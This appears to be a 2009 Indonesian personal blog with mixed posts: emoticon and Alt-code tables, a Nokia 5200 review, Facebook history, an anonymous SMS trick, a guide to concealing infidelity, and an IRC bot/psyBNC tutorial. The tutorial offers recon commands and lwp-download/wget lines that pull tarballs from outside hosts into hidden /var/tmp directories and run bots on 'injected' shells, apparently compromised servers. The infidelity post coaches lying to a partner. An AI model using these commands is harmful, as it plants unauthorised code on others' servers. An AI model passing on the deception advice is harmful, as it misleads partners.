Selasa, 15 Desember 2009

tugas telaah

Diposting oleh Ranieqyu di 23.53 0 komentar
bagi siapa ja nich yang lagi butuh tugas telaah kurikulum nich aku ada dikit contoh soal yang mungkin bisa bantu kalian semua ok...

silahkan download disini

Selingkuh itu Indah

Diposting oleh Ranieqyu di 23.45 0 komentar

Selingkuh Itu Indah?


Selingkuh kini sudah jadi tradisi. Entah dari masa asalnya, selingkuh tiba-tiba dianggap indah dan merupakan sesuatu yang disahkan. Tapi, jika selingkuh ketahuan sang pacar, bisa jadi malapetaka, tidak hanya putus, akan ada dendam bahkan pembalasan untuk mereka yang selingkuh.

Bagaimana sih caranya biar tidak ketahuan..?

1. Untuk para penyelingkuh, harus memperhatikan rambu-rambu selingkuh. Utamanya, jangan meninggalkan jejak yang nantinya gampang diketahui sang pacar. Contohnya aja, semua Inbox maupun Outbox yang ada di telepon genggam harus bersih, saat ketemu. Jangan pernah meninggalkan tanda apapun di baju, celana, apalagi di badan sendiri. Dan juga tidak boleh menerima atau memajang barang apapun yang akan mengundang kecurigaan. Misalnya saja, dapat boneka atau miniatur F1, segera saja deh simpan di lemari.

2. Jangan memberikan nomor telepon yang sama kepada pacar dan selingkuhan. Kalau bisa sih, punya beberapa telepon dalam satu waktu. Kalau tidak ada, manfaatkan kartu perdana murah. Atau dengan alasan lain, "Maaf handphone-ku dipinjam teman."

3. Alamat rumah perlu dirahasiakan dari selingkuhan. Karena biasanya, selingkuhan sering nekat datang ke rumah jika tidak dihubungi dalam jangka beberapa waktu lamanya.

4. Sedikit memberikan keterangan palsu yang menaikan derajat, harkat, dan martabat. Misalnya saja, "Ini mobilku". Padahal, sepeda motor aja pinjaman. Jadi, jika ketemu dijalan, selingkuhan tidak akan tahu dan menyapa jika kita bersama sang pacar.

5. Sama seperti nomor telepon, usahakan juga punya beberapa alamat email. Kadang berpura-pura 'gaptek' bisa juga jadi syarat selingkuh. Berpura-pura tidak bisa internet, padahal punya segudang pacar walaupun dalam dunia maya melalui chatting.

6. Siapkan berbagai rencana, jawaban, alasan, maupun karangan cerita untuk berjaga-jaga. Siapa tahu sang pacar curiga dan menanyakan hal yang macam-macam. Kalau untuk hal ini, diusahakan belajar menatap matanya dan sedikit belajar memelas bahkan menangis.

7. Jangan terlalu banyak berbicara mengenai hal-hal baru. Banyak kejadian seperti ini yang akhirnya menjebak. Contohnya, saat sang pacar membahas tentang cerita film baru, biasanya kita tidak mau kalah dengan menjawab, "Oh iya, ceritanya bla..bla..bla.."

8. Sesuaikan jadwal kencan. Bila perlu seperti kursus, senin-kamis, selasa-jumat, dan lain-lain. Dan bila memungkinkan, berilah satu hari ekstra untuk diri sendiri, jadi seumpamanya sang pacar sudah mulai curiga, Anda bisa membuktikannya di satu hari luang itu. Yang paling penting, buat rencana dengan bersela-sela, jangan monoton.

9. Koleksilah beberapa parfum, khususnya parfum yang sama dengan milik selingkuhan atau pacar. Simpanlah di botol-botol kecil sehingga bisa disemprotkan kapan saja, tanpa meninggalkan aroma lain. Jika memungkinkan, bawalah baju cadangan jika ingin bertemu pacar dan selingkuhan dalam waktu yang hampir sama.

10. Saat membawa selingkuhan jalan-jalan, jangan pernah menyapa penjaga toko, penjual karcis bioskop, atau ke tempat-tempat yang dikenal sang pacar. Banyak yang menyukai kita, tapi lebih banyak lagi yang tidak suka melihat kita selingkuh.

11. Jangan pernah menjanjikan apa-apa kepada selingkuhan, baik materi, janji, maupun kata-kata indah.

12. Ceritakan kepada selingkuhan, jika Anda sudah mempunyai pasangan. Biasanya, ini jurus jitu yang langsung mematahkan pemikiran bahwa Anda salah telah berselingkuh. 'Lha wong sama-sama mau kok'.

13. Usahakan jangan serius menceritakan masalah yang dihadapi kepada selingkuhan, karena semua itu bisa menjadi boomerang untuk diri kita sendiri. Ingatlah, jika selingkuhan itu nekat.

14. Jangan berbuat sesuatu yang berlebihan dengan selingkuhan. Apalagi melebihi sang pacar, lain halnya jika Anda selingkuh untuk mendapatkan yang lebih baik.

Namun, seperti kata pepatah, 'Sepandai-pandainya tupai melompat, suatu saat akan jatuh juga'. Sepintarnya kita menyimpan rahasia jelek, pasti dampaknya akan buruk di kemudian hari. Selingkuhan bisa menyenangkan jika kita seperti tupai yang belum pernah jatuh :D. (boo)

Senin, 09 November 2009

Smilley Facebook

Diposting oleh Ranieqyu di 01.40 0 komentar
smiley facebook (emoticon)Sering chating dengan teman di facebook? pasti ada yang terasa kurang dibandingkan bila kita chating menggunakan yahoo messenger yang mempunyai banyak smiley (emoticon). Sebenarnya facebook juga mempunyai smiley yang cukup banyak hanya saja pengguna facebook banyak yang tidak tahu kode untuk menampilkan smiley tersebut. Mau tambah asyik ngobrol dengan teman di facebook silakan tambahkan kode-kode smiley facebook

Facebook Happy Smiley Face
:) :( :P :D :O ;) 8) 8| >:( :\ :'( 3:)
O:) :-* <3 ^_^ -_- O.o >:o :v :3 :|] :putnam:
satu lagi gambar hiu dengan kode (^^^) http://i15.photobucket.com/albums/a398/syilpid/blog/smileyfacebook/shark_fb_smiley.jpg

Minggu, 27 September 2009

haloooo met lebaran yaaaa...

Diposting oleh Ranieqyu di 01.20 0 komentar
haloooo met lebaran yaaaa...




Jumat, 04 September 2009

Tisp mIRC kombinasi Alt+angka

Diposting oleh Ranieqyu di 01.41 0 komentar
Haloo temen2 ketemu lagi ni dengan artikel Tips mIRC nah sekarang kita akan mencoba membuat simbol-simbol dengan kombinasi Alt+angka.. menarik lho lumayan ada yang gambar senyum hati.. cocok bagt buat temen2 yang berjiwa mIRC... simbol2 tersebut adalah Kode ASCII. bisa di gunakan di program apapun...
contoh nya kayak gini = alt + 1 = ☺, alt + 2 = ☻, alt + 3 = ♥, alt + 4 = ♦, alt + 5 = ♣, tapi lengkapnya bisa liat di tabel di bawah ini

Kode Standar Amerika untuk Pertukaran Informasi atau ASCII (American Standard Code for Information Interchange) merupakan suatu standar internasional dalam kode huruf dan simbol seperti Hex dan Unicode tetapi ASCII lebih bersifat universal.
Kode ASCII selalu digunakan oleh komputer dan alat komunikasi lain untuk menunjukkan teks.
Kode ASCII sebenarnya memiliki komposisi bilangan biner sebanyak 8 bit.
Dimulai dari 00000000 hingga 11111111.
Total kombinasi yang dihasilkan sebanyak 256, dimulai dari kode 0 hingga 255 dalam sistem bilangan Desimal.

Contoh : Tekan dan tahan tombol ALT pada keyboard lalu tekan angka 1 pada Numpad keyboard, setelah itu lepaskan tombol ALT. Kombinasi ini akan menghasilkan karakter ☺ .
Berikut adalah kumpulan kode ascii yang dapat anda gunakan dengan cara melakukan kombinasi pada tombol keyboard anda.


­1. alt + 1 = ☺
2. alt + 2 = ☻
3. alt + 3 = ♥
4. alt + 4 = ♦
5. alt + 5 = ♣
6. alt + 6 = ♠
7. alt + 7 = •
8. alt + 8 = ◘
9. alt + 9 = ○
10. alt + 10 = ◙
11. alt + 11 = ♂
12. alt + 12 = ♀
13. alt + 13 = ♪
14. alt + 14 = ♫
15. alt + 15 = ☼
16. alt + 16 = ►
17. alt + 17 = ◄
18. alt + 18 = ↕
19. alt + 19 = ‼
20. alt + 20 = ¶
21. alt + 21 = §
22. alt + 22 = ▬
23. alt + 23 = ↨
24. alt + 24 = ↑
25. alt + 25 = ↓
26. alt + 26 = →
27. alt + 27 = ←
28. alt + 28 = ∟
29. alt + 29 = ↔
30. alt + 30 = ▲
31. alt + 31 = ▼
32. alt + 32 = “space”
33. alt + 33 = !
34. alt + 34 = “
35. alt + 35 = #
36. alt + 36 = $
37. alt + 37 = %
38. alt + 38 = &
39. alt + 39 = ‘
40. alt + 40 = (
41. alt + 41 = )
42. alt + 42 = *
43. alt + 43 = +
44. alt + 44 = ,
45. alt + 45 = -
46. alt + 46 = .
47. alt + 47 = /
48. alt + 48 = 0
49. alt + 49 = 1
50. alt + 50 = 2
51. alt + 51 = 3
52. alt + 52 = 4
53. alt + 53 = 5
54. alt + 54 = 6
55. alt + 55 = 7
56. alt + 56 = 8
57. alt + 57 = 9
58. alt + 58 = :
59. alt + 59 = ;
60. alt + 60 = < 61 =" =" 62 =" ">
63. alt + 63 = ?
64. alt + 64 = @
65. alt + 65 = A
66. alt + 66 = B
67. alt + 67 = C
68. alt + 68 = D
69. alt + 69 = E
70. alt + 70 = F
71. alt + 71 = G
72. alt + 72 = H
73. alt + 73 = I
74. alt + 74 = J
75. alt + 75 = K
76. alt + 76 = L
77. alt + 77 = M
78. alt + 78 = N
79. alt + 79 = O
80. alt + 80 = P
81. alt + 81 = Q
82. alt + 82 = R
83. alt + 83 = S
84. alt + 84 = T
85. alt + 85 = U
86. alt + 86 = V
87. alt + 87 = W
88. alt + 88 = X
89. alt + 89 = Y
90. alt + 90 = Z

91. alt + 91 = [
92. alt + 92 = \
93. alt + 93 = ]
94. alt + 94 = ^
95. alt + 95 = _
96. alt + 96 = `
97. alt + 97 = a
98. alt + 98 = b
99. alt + 99 = c
100. alt + 100 = d
101. alt + 101 = e
102. alt + 102 = f
103. alt + 103 = g
104. alt + 104 = h
105. alt + 105 = i
106. alt + 106 = j
107. alt + 107 = k
108. alt + 108 = l
109. alt + 109 = m
110. alt + 110 = n
111. alt + 111 = o
112. alt + 112 = p
113. alt + 113 = q
114. alt + 114 = r
115. alt + 115 = s
116. alt + 116 = t
117. alt + 117 = u
118. alt + 118 = v
119. alt + 119 = w
120. alt + 120 = x
121. alt + 121 = y
122. alt + 122 = z
123. alt + 123 = {
124. alt + 124 = |
125. alt + 125 = }
126. alt + 126 = ~
127. alt + 127 = ⌂
128. alt + 128 = Ç
129. alt + 129 = ü
130. alt + 130 = é
131. alt + 131 = â
132. alt + 132 = ä
133. alt + 133 = à
134. alt + 134 = å
135. alt + 135 = ç
136. alt + 136 = ê
137. alt + 137 = ë
138. alt + 138 = è
139. alt + 139 = ï
140. alt + 140 = î
141. alt + 141 = ì
142. alt + 142 = Ä
143. alt + 143 = Å
144. alt + 144 = É
145. alt + 145 = æ
146. alt + 146 = Æ
147. alt + 147 = ô
148. alt + 148 = ö
149. alt + 149 = ò
150. alt + 150 = û
151. alt + 151 = ù
152. alt + 152 = ÿ
153. alt + 153 = Ö
154. alt + 154 = Ü
155. alt + 155 = ¢
156. alt + 156 = £
157. alt + 157 = ¥
158. alt + 158 = ₧
159. alt + 159 = ƒ
160. alt + 160 = á
161. alt + 161 = í
162. alt + 162 = ó
163. alt + 163 = ú
164. alt + 164 = ñ
165. alt + 165 = Ñ
166. alt + 166 = ª
167. alt + 167 = º
168. alt + 168 = ¿
169. alt + 169 = ⌐
170. alt + 170 = ¬
171. alt + 171 = ½
172. alt + 172 = ¼
173. alt + 173 = ¡
174. alt + 174 = «
175. alt + 175 = »
176. alt + 176 = ░
177. alt + 177 = ▒
178. alt + 178 = ▓
179. alt + 179 = │
180. alt + 180 = ┤

181. alt + 181 = ╡
182. alt + 182 = ╢
183. alt + 183 = ╖
184. alt + 184 = ╕
185. alt + 185 = ╣
186. alt + 186 = ║
187. alt + 187 = ╗
188. alt + 188 = ╝
189. alt + 189 = ╜
190. alt + 190 = ╛
191. alt + 191 = ┐
192. alt + 192 = └
193. alt + 193 = ┴
194. alt + 194 = ┬
195. alt + 195 = ├
196. alt + 196 = ─
197. alt + 197 = ┼
198. alt + 198 = ╞
199. alt + 199 = ╟
200. alt + 200 = ╚
201. alt + 201 = ╔
202. alt + 202 = ╩
203. alt + 203 = ╦
204. alt + 204 = ╠
205. alt + 205 = ═
206. alt + 206 = ╬
207. alt + 207 = ╧
208. alt + 208 = ╨
209. alt + 209 = ╤
210. alt + 210 = ╥
211. alt + 211 = ╙
212. alt + 212 = ╘
213. alt + 213 = ╒
214. alt + 214 = ╓
215. alt + 215 = ╫
216. alt + 216 = ╪
217. alt + 217 = ┘
218. alt + 218 = ┌
219. alt + 219 = █
220. alt + 220 = ▄
221. alt + 221 = ▌
222. alt + 222 = ▐
223. alt + 223 = ▀
224. alt + 224 = α
225. alt + 225 = ß
226. alt + 226 = Γ
227. alt + 227 = π
228. alt + 228 = Σ
229. alt + 229 = σ
230. alt + 230 = µ
231. alt + 231 = τ
232. alt + 232 = Φ
233. alt + 233 = Θ
234. alt + 234 = Ω
235. alt + 235 = δ
236. alt + 236 = ∞
237. alt + 237 = φ
238. alt + 238 = ε
239. alt + 239 = ∩
240. alt + 240 = ≡
241. alt + 241 = ±
242. alt + 242 = ≥
243. alt + 243 = ≤
244. alt + 244 = ⌠
245. alt + 245 = ⌡
246. alt + 246 = ÷
247. alt + 247 = ≈
248. alt + 248 = °
249. alt + 249 = ∙
250. alt + 250 = ·
251. alt + 251 = √
252. alt + 252 = ⁿ
253. alt + 253 = ²
254. alt + 254 = ■
255. alt + 255 = “space”




Minggu, 16 Agustus 2009

Rahasia Nokia 5200

Diposting oleh Ranieqyu di 00.15 0 komentar
Handphone ini mempunyai harga yang ekonomis namun lengkap. Kenapa saya sebut lengkap? karena dia memiliki fitur penting yang diidamkan pengguna handphone dengan kantong tidak tebal. Anda bisa mendapatkan kamera VGA (yang cukup jernih dan lumayan),tidak kalah sama kamera 1.3 Mpixel, radio FM (untuk yang senang mengumpulkan informasi lokal), dan MP3 player. Selain itu anda bisa menyimpan banyak file video. ponsel ini adalah salah satu ponsel keluaran nokia yang berbentuk slide. ponsel ini mirip sekali dengan ponsel keluaran nokia yang lain seperti nokia 5300. selain itu ponsel nokia 5200 mampu bisa mengupgread/menambah memori sampai 1 Gb lumayan kan. Hp ini juga dibekali tombol express music. Jadi gak perlu repot klo memutar music.

Di sisi suaranya hp ini tidak kalah sama hp express music keluaran terbaru. Di dukung dengan bentuk yang mungil dan pilihan warna yang banyak. Kabel datanya pun sangat mudah di cari di toko-toko mirip kabel data mp3/mp4. jadi kita tidak perlu repot2 membuka memory di dalam hp kalau hanya sekedar mengkopy file foto atau musik. Apabila kita mau internetan pake Hp tersebut, kita dapat jadikan sebagai modem. Tinggal kita mengistal PC suite yang bisa kita download dari situs nokia.com. Nokia 5200 ini bnyak di gemari oleh para cewek-cewek.. ^_^ (aku juga pake lho).. berikut spesifikasi Nokia 5200 :


Spesifikasi Lengkap Nokia 5200 :
Network system : GSM 900 / GSM 1800 / GSM 1900
Size : 92.4 x 48.2 x 20.7 mm, 85 cc
Weight : 104 g
Display :
- CSTN, 256K colors
- 128 x 160 pixels
- Downloadable Themes

Battery type Standard battery, Li-Ion 760 mAh (BL-5B)
Stand-by Up to 263 h
Talk time Up to 3 h 10 min
Ringtones Polyphonic (64 channels), MP3
Option
Number in phone Yes
Call records Yes
Memory
- microSD (TransFlash), hotswap
- 5 MB internal memory
GPRS Class 10 (4+1/3+2 slots), 32 - 48 kbps
Messaging SMS, MMS, Instant Messaging
Infrared port Yes
Games Yes
Color Red, Blue ,black
Features :
- Camera VGA, 640x480 pixels, video
- WAP 2.0/xHTML, HTML
- Bluetooth
- Java MIDP 2.0
- Stereo FM radio
- MP3/SpMidi/AAC/AAC+ player
- T9
- Reminders
- Stopwatc

Rabu, 12 Agustus 2009

SMS gratis lewat mIRC

Diposting oleh Ranieqyu di 00.10 0 komentar
Halo temen2… nih ada tips terbaru dari mirc…. Pernah gak kita ada sms penting dari tmn tapi gak ada pulsa untuk balesi. Pasti sedih bgt ya.. Nah tips kali ini berhubungan dengan sms ne. apabila temen2 gak punya pulsa, ato mau iseng2 ke orang.. nih ada alternatif sms gratis lwat mirc. Lumayan asik klo sekedar sms 1 ato 2 sms mayan kan,, Selengkapnya...

Nah untuk nick yang kita gunakan gak perlu registeran tapi sembarang. Gmana caranya.. guampang bngt. masuk ke server Dalnet trus Join aja ke chan #iguanasms, nanti di situ ada format pengiriman sms contohny klo gak salah kayak gini !sms (No Hp) (pesen kamu) tapi ini hanya berlaku untuk 08xxxx untuk yang kayak flexi, starone kayknya gak bisa tuh…

Kemudian apabila pengen sms lagi tunggu 10 menitan baru bisa kirim lagi.. lumayan cepet sampek kok smsnya. Yang seru, no pengirim itu gonta ganti jadi gak kelacak… tapi setiap sms yang masuk mesti akan keluar nick kamu… ohya karakternya jgan terlalu banyak nanti berpengaruh terhadap lama sms kita nyampek ke tujuan…. heehehheh penasaran… join ja langsung… moga2 chan ini terus exis biar kita bs kirim sms ke temen2…. Selamat mencoba…



Sabtu, 25 Juli 2009

Penemu Facebook

Diposting oleh Ranieqyu di 21.35 0 komentar
Facebook diluncurkan pertama kali pada tanggal 4 Februari 2004 oleh Mark Zuckerberg sebagai media untuk saling mengenal bagi para mahasiswa Harvard.

Dalam waktu dua minggu setelah diluncurkan, separuh dari semua mahasiswa Harvard telah mendaftar dan memiliki account di Facebook. Tak hanya itu, beberapa kampus lain di sekitar Harvard pun meminta untuk dimasukkan dalam jaringan Facebook.

Zuckerberg pun akhirnya meminta bantuan dua temannya untuk membantu mengembangkan Facebook dan memenuhi permintaan kampus-kampus lain untuk bergabung dalam jaringannya. Dalam waktu 4 bulan semenjak diluncurkan, Facebook telah memiliki 30 kampus dalam jaringannya.

Dengan kesuksesannya tersebut, Zuckerberg beserta dua orang temannya memutuskan untuk pindah ke Palo Alto dan menyewa apartemen di sana.

Setelah beberapa minggu di Palo Alto. Zuckerberg berhasil bertemu dengan Sean Parker (cofounder Napster), dan dari hasil pertemuan tersebut Parker pun setuju pindah ke apartemen Facebook untuk bekerja sama mengembangkan Facebook. Tidak lama setelah itu, Parker berhasil mendapatkan Peter Thiel (cofounder Paypal) sebagai investor pertamanya. Thiel menginvestasikan 500 ribu US Dollar untuk pengembangan Facebook.

Jumlah account di Facebook terus melonjak, sehingga pada pertengahan 2004 Friendster mengajukan tawaran kepada Zuckerberg untuk membeli Facebook seharga 10 juta US Dollar, dan Zuckerberg pun menolaknya. Zuckerberg sama sekali tidak menyesal menolak tawaran tersebut sebab tak lama setelah itu Facebook menerima sokongan dana lagi sebesar 12.7 juta US Dollar dari Accel Partners. Dan semenjak itu so

Rabu, 22 Juli 2009

Belajar Psybnc & Bot Di mIRC

Diposting oleh Ranieqyu di 23.07 0 komentar
Untuk dapat membuat bot dan psybNC, kamu harus punya shell yang bagus
lebih bagus lagi kamu pegang akses root....

klu kamu belum punya shell yang bagus dapet di ambil di

http://www.manadocoding.com/forum/viewtopic.php?t=1627

ok sekaran kita mulai caranya ...

Cara Praktis membuat bot dan psyBNC di dalnet

==========================
command2 Dasar server Linux dan FreebSD:
1. uname -a;id <<== untuk melihat jenis server dan id 2. /sbin/ifconfig | grep inet<<== untuk melihat ip server 3. find / -type d -perm 777 <<== untuk melihat direktori yg tidak permission denied 4. mkdir <<== untuk membuat direktori baru example: mkdir love 5. ls -alF <<== untuk melihat semua file dalam sebuah direktory 6. wget/lwp-download/curl -f -O <<== untuk mendownload file kita kedalam server cara membuat bot dari server Linux: 1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/acz.tgz
2. cd /var/tmp;tar -zxvf acz.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./dssl a.txt atau cd /var/tmp;./eggdrop -m a.txt

cara membuat bot dari server FreeBsd:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/aczbsd.tgz
2. cd /var/tmp;tar -zxvf aczbsd.tgz
3. cd /var/tmp;rm -fr acz.tgz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdop -m a.txt

cara load psy dari server Linux:
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/AhoK.tar.gz
2. cd /var/tmp;tar -zxvf AhoK.tar.gz
3. cd /var/tmp;rm -fr AhoK.tar.gz
4. cd /var/tmp/AhoK;./config (IDENTD) (PORT)
5. cd /var/tmp/AhoK;./f**k
6. cd /var/tmp/AhoK;./run
kalau uda dirun coba join ke #samudra lalu test portcheck.. example `pc (nomerIP) (PORT)

cara load psy dari server FreeBsd:

1. cd /var/tmp;wget http://www.solsiden.info/psy/samsengpsy.tgz
2. cd /var/tmp;tar zxfv samsengpsy.tgz
3. cd /var/tmp;rm -fr samsengpsy.tgz
4. cd /var/tmp/samseng;./config (IDENTD) (PORT)
5. cd /var/tmp/samseng;./f**k
6. cd /var/tmp/samseng;./run

bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server Linux
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufi.tar.gz
2. cd /var/tmp;tar -zxvf Gufi.tar.gz
3. cd /var/tmp rm -fr Gufi.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh

bot Portcheck, os, ip-to-country, jodoh dan dns, tinggal load aja, untuk server FreeBsd
1. cd /var/tmp;lwp-download http://towardspakistan.com/tmp/Gufibsd.tar.gz
2. cd /var/tmp;tar -zxvf Gufibsd.tar.gz
3. cd /var/tmp rm -fr Gufibsd.tar.gz
4. cd /var/tmp/.sh;./nadya a.txt (namabot) (identd) (nomerIP) (channel) (owner)
5. cd /var/tmp/.sh;./eggdrop -m a.txt
kalau uda masuk botnya coba test !dns [host] | !ip2c | `pc [host] [port] | !jodoh


sedikit saran
klu mau buat bot dan psyBNC, jangan terlalu banyak buatnya
dalam 1 shell injeck, soalnya nanti di kill ama dalnet

Installasi PsyBNC pada OS Windows

=================================
Instalasi psyBNC2.3.1 For Windows
=================================
DOWNLOAD
File : psybnc2.3.1.exe
http://lieur-euy.cat-on-line.com/psybnc2.3.1.exe

INSTALASI
1. Extact file psybnc2.3.1.exe pada direktory C:
2. Masuk pada direktory C:psybnc
3. Anda juga dapat merubah portnya dengan menggunakan editor text seperti Notepad Wordpad atau
yang lain, C:psybnc cari file dengan nama psybnc.conf | klik kanan | Open With ..
pada kolom [ ] Always use this program to open this file jangan di beri tanda centang
4. save : file ==>> save
5. Klik Start ==>> Run ==>> Command
6. Ikuti langkah berikut pada MS-DOS Prompt =

Microsoft(R) Windows 98
(C)Copyright Microsoft Corp 1981-1999.

C:WINDOWSDesktop>cd..

C:WINDOWS>cd..

C:>cd psybnc..

C:psybnc>psybnc.exe
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-.
,—-.,—-.,-. ,-.,—.,–. ,-.,—-.
| O || ,-’ / / | o || | || ,–’
| _/ _ / | o< | | || |__ |_| |____/ |__| |___||_| _| ___| Version 2.3.1 (c) 1999-2002 the most psychoid and the cool lam3rz Group IRCnet `-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=tCl=-’ Configuration File: psybnc.conf Language File: psyBNC Language File - English No logfile specified, logging to log/psybnc.log Listening on: 0.0.0.0 port 31337 psyBNC2.3.1-cBtITLdDMSNp started (PID 2080107) C:psybnc>

7. Buka mIRC
8. Ubah IDENT pada mIRC Option sesuai dengan keinginan Anda
9.
Ketik /server IP Komputer Anda 31337 <<== ini port standard (belum dirubah) -Welcome- psyBNC2.3.1 - –psyBNC- Your IRC Client did not supporrrt a password. Please type /QUOTE PASS
yourpassword to connect.
-

8. /QUOTE PASS (pass yang Anda inginkan)
9. /addserver mesra-e.dal.net:6667
/addserver hotspeed.dal.net:6667

Untuk Setting psyBNC selanjutnya Anda dapat melihatnya di:

http://geocities.com/erahman2001/setingpsy

=====================================================
psyBNC Under Windows Anda Autorun
=====================================================

=========================================================
Menjalankan psyBNC Saat Memulai Windows (using start up)
=========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, dapat menggunakan fasilitas
Start Up di start menu. Caranya cukup simpel, yaitu sbb :

Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka windows Explorer, dan masuk ke direktory C:WINDOWSStart MenuProgramsStartUp
2. Buat shortcut untuk PsyBNC dengan mengklik kanan di area yang kosong, kemudian pilih
New >> ShortCut
3. Buat command line untuk notepad yaitu C:psybncpsybnc.exe atau pilih Browse
4. Klik tombol Next, kemudian Finish
5. Restart PC dan Windows akan otomatis menjalankan psybnc.

========================================================
Menjalankan psyBNC Saat Memulai Windows (using registry)
========================================================

Untuk menjalankan psyBNC saat masuk Windows secara otomatis, sebenarnya kita dapat menggunakan
fasilitas Start Up. Tetapi ada cara yang lebih advanced, yaitu dengan menggunakan registry.
Misalnya kita akan menjalankan psyBNC saat mulai Windows, caranya dengan menggunakan tip
berikut ini.

1. Buka Registry dengan Regedit : klik Start|Run| ketik Regedit | klik OK
2. Buka key [HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun]
Pilih Edit | New | String Value, dan beri nama C:psybncpsybnc.exe
3. Isi valuenya dengan ‘C:psybncpsybnc.exe’
4. Restart PC

=======================================================
Menjalankan psyBNC Saat Memulai Windows (using Win.ini)
=======================================================

Ini adalah cara yang lain untuk memaksa Windows menjalankan program yang kita inginkan. Dua cara
yang lain adalah dengan cara klasik yaitu dengan Start Up menu dan dengan cara yang advanced
yaitu dengan menggunakan registry.

Cara ini menggunakan file sistem Windows yaitu Win.ini. Berikut ini adalah hal - hal yang perlu
pembaca lakukan untuk menjalankan program secara otomatis dengan menggunakan file Win.ini.
Diasumsikan program yang akan dijalankan adalah psybnc.exe yang ada di direktori C:psybnc.

1. Carilah file Win.ini yang berada di diirektori C:Windows
2. Buka dengan menggunakan editor text seeperti Notepad atau yang lain
3. Carilah entri yang bernama “load”
4. Kemudian isi dengan ‘C:psybncpsybnc.exe’, sehingga lengkapnya
menjadi “load=C:psybncpsybnc.exe”
5. Pilih menu File > Save, dan restart PC

Mudah khan ??
Selamat mencoba !!!

Pasang Psybnc

ok kita ambil contoh file ini
http://www.psybnc.info/download/psybnc2.3.2-4b.exe
file size sekitar 750kb.
kita taruh di c:/

double klik file psybnc2.3.2-4b.exe
lalu akan ada dialog extract to c:\psybnc\ ikuti saja dengan klik tombol extract
setelah sukses ada kotak pesan “successfully completed the operation” klik ok
sekarang kita double klik folder c:\psybnc

disitu kita lihat ada file psybnc.exe dan ada psybnc.conf
disini kita bisa edit dulu file psybnc.conf jika ingin merubah port nya yang
defaultnya adalah 31337
berikut contoh pada file psybnc.conf
=================================
PSYBNC.SYSTEM.PORT1=31337
PSYBNC.SYSTEM.HOST1=*
PSYBNC.HOSTALLOWS.ENTRY0=*;*
=================================
baris pertama artinya psybnc listen pada port 31337 artinya nanti kita konek ke port 3317
barius kedua adalah ip listen bisa kita isikan ip dari ipkomputer yang kita install psybnc atau kita beri tanda bintang
yang artinya semua ip terdeteksi di system.
baris ketiga adalah host allow, artinya semua ip bisa loggin ke psybnc kita. jika kita spesifikasikan
ipnya misal psybnc.HOSTALLOWS.ENTRY=*.* kita beri suatu ip

ok kita anggap selesai psybnc.conf jika masih bingung biarkan saja seperti aslinya.
langkah selanjutnya kita double klik psybnc.exe
dan psybnc.exe akan dijalankan muncul dos prompt sekilas lalu menghilang bisa kalian check psybnc.exe sudah jalan lewat menu task manager

sekarang kita pergi ke mirc ( program chating favoritku :P~)

kita konek ke psybnc kita.
disini saya contohkan ip psybnc adalah 192.168.0.83 dengan port 31337 ident pertama kali bebas dan password kosong jika memakai psybnc.conf default diatas.

di mirc kita pilih options atau gambar palu di kiri atas.
isikan
full name : nama anda
email address: admin@
nickname : nickmu
alternative: nick-lain

klik ok

di status ketik perintah konek berikut
/server 192.168.0.83:31337 <<<<>Please type /QUOTE PASS yourpassword to connect.

/QUOTE PASS 123456 <<<> Welcome xxx !
<-psyBNC> You are the first to connect to this new proxy server.
<-psyBNC> You are the proxy-admin. Use ADDSERVER to add a server so the bouncer may connect.
<-psyBNC> psyBNC2.3.2-4 Help (* = BounceAdmin only)
<-psyBNC> ————————————–
<-psyBNC> BHELP BWHO - Lists all Users on the Bouncer
<-psyBNC> BHELP PASSWORD - Sets your or another Users Password(Admin)
<-psyBNC> BHELP BVHOST - Sets your vhost to connect thru
<-psyBNC> BHELP PROXY - Sets your proxy to connect thru
<-psyBNC> BHELP SETUSERNAME - Sets your User Name
<-psyBNC> BHELP SETAWAY - Sets your away-Text when you leave
<-psyBNC> BHELP SETLEAVEMSG - Sets your Leave-MSG when you leave
<-psyBNC> BHELP LEAVEQUIT - If set to 1, parts all channels on quit
<-psyBNC> BHELP SETAWAYNICK - Sets your nick when you are offline
<-psyBNC> BHELP JUMP - Jumps to the next IRC-Server
<-psyBNC> BHELP BQUIT - Quits your current Server Connection
<-psyBNC> BHELP BCONNECT - Reconnects a bquitted Connection
<-psyBNC> BHELP AIDLE - Enables/Disables Antiidle
<-psyBNC> BHELP AUTOREJOIN - Enables/Disables Auto-Rejoin
<-psyBNC> BHELP ADDSERVER - Adds an IRC-Server to your Serverlist
<-psyBNC> BHELP DELSERVER - Deletes an IRC-Server by number
<-psyBNC> BHELP LISTSERVERS - Lists all IRC-Servers added
<-psyBNC> BHELP ADDNETWORK - Adds a seperate Network to your client
<-psyBNC> BHELP DELNETWORK - Deletes a Network from your client
<-psyBNC> BHELP SWITCHNET - Switches to a given Network
<-psyBNC> BHELP ADDOP - Adds a User who may get Op from you
<-psyBNC> BHELP DELOP - Deletes an added User who got Op
<-psyBNC> BHELP LISTOPS - Lists all added Ops
<-psyBNC> BHELP ADDAUTOOP - Adds a User who gets Auto-Op from you
<-psyBNC> BHELP DELAUTOOP - Deletes an added User who got Op
<-psyBNC> BHELP LISTAUTOOPS - Lists all added Auto-Ops
<-psyBNC> BHELP ADDBAN - Adds a ban (global or to a channel)
<-psyBNC> BHELP DELBAN - Deletes a ban by Number
<-psyBNC> BHELP LISTBANS - Lists all bans
<-psyBNC> BHELP ADDASK - Adds a host/bot to ask Op from
<-psyBNC> BHELP DELASK - Deletes a host/bot to ask Op by Number
